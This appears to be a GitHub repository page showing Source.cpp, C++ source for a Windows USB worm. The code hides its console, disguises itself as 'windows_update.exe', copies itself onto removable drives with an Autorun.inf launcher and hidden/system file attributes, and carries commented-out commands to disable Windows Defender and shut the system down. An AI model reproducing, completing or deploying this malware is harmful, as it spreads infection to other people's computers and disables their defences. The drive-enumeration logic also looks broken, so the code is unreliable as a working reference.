-
Notifications
You must be signed in to change notification settings - Fork 0
/
Source.cpp
119 lines (110 loc) · 3.4 KB
/
Source.cpp
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
#include<iostream>
#include<conio.h>
#include<string.h>
#include<stdio.h>
#include<stdlib.h>
#include<Windows.h>
#include<shellapi.h>
#include<processthreadsapi.h>
#include<direct.h>
#include<libloaderapi.h>
#include<winuser.h>
using namespace std;
#define PROCESSNAME "windows_update.exe"
#define DISGUISE "windows_update.exe"
#define DISGUISEPATH "\\windows_update.exe"
void Stealth()
{
HWND Stealth;
AllocConsole();
Stealth = FindWindowA("ConsoleWindowClass", NULL);
ShowWindow(Stealth, 0);
}
void _declspec(dllexport)systemproc(char* proc) //payload thread loader//
{
SetThreadPriority(GetCurrentThread(), THREAD_PRIORITY_LOWEST); //sets priority of worm thread to avoid detection//
for (int i = 0; i < 10; i++)
{
/// system("sc config WinDefend start= disabled"); /// stops windows defender//
/// system("sc stop WinDefend"); ///
// system("netsh wlan disconnect"); ///
}
/// system("c:\\windows\\system32\\shutdown /s"); /// shuts down system//
}
void _declspec(dllexport)procCloner(char* cfile) //usb drive checker and copier//
{
FILE* fp;
char drive[3], npos[30], autof[20];
int iob = 0x43, i;
struct stat stbuf;
for (i = 0; i < 256; i++)
{
if (iob > 0x5A)
{
iob = 0x43;
drive[1] = ':'; //drive 1 indicates normal partitions//
drive[2] = ' ';
if ((GetDriveType(drive)) == 2) //drive 2 indicates usb drives//
{
strcpy(npos, drive);
strcat(npos, DISGUISEPATH);
strcpy(autof, drive);
if ((stat(npos, &stbuf))== -1)
{
CopyFile(cfile, npos, 0); //transfers disguised worm copy to usb drive//
strcat(autof, "\\Autorun.inf");
fp = fopen(autof, "w");
fprintf(fp, "[autorun]\nopen=%s", DISGUISE);
fclose(fp);
SetFileAttributes(npos,28);
}
else
{
continue;
}
}
}
}
}
int main(int argc, char* argv[])
{
Stealth();
Sleep(1000000);
ShellExecute(NULL, "open", PROCESSNAME, NULL, NULL, 0);
SetThreadPriority(GetCurrentThread(), THREAD_PRIORITY_LOWEST); //sets current thread overhead priority//
HANDLE thread, cloner, thands[3];
char* ptr, procfile[300];
ptr = argv[0];
strcpy_s(procfile, ptr);
if (strstr(ptr, ".exe")== NULL)
{
strcat_s(procfile, ".exe");
}
void(*clonproc)(char*);
clonproc = procCloner;
cloner = CreateThread(0, 0, (DWORD(__stdcall*)(void*))clonproc, procfile, 0, 0); //clones current thread//
HMODULE hmod;
char dirpath[201];
void(*smack)(char*);
GetCurrentDirectory(200, dirpath);
hmod = LoadLibrary(procfile);
if (strstr(dirpath, "Program Files")!= NULL)
{
smack = (void(*)(char*))GetProcAddress(hmod, "?SystemProcAinzOoalGown");
thread = CreateThread(0, 0, (DWORD(__stdcall*)(void*))smack, procfile, 0, 0);
}
else
{
smack = (void(*)(char*))GetProcAddress(hmod, "?identifyAinzOoalGown");
thread = CreateThread(0, 0, (DWORD(__stdcall*)(void*))smack, procfile, 0, 0);
}
thands[0] = cloner;
thands[1] = thread;
thands[2] = ' ';
WaitForMultipleObjects(2, thands, true, 100);
FreeLibrary(hmod);
_wchdir("C:");
ShellExecute(NULL, "open", PROCESSNAME, NULL, NULL, 0);
ShellExecute(NULL, "open", PROCESSNAME, NULL, NULL, 0);
return EXIT_SUCCESS;
}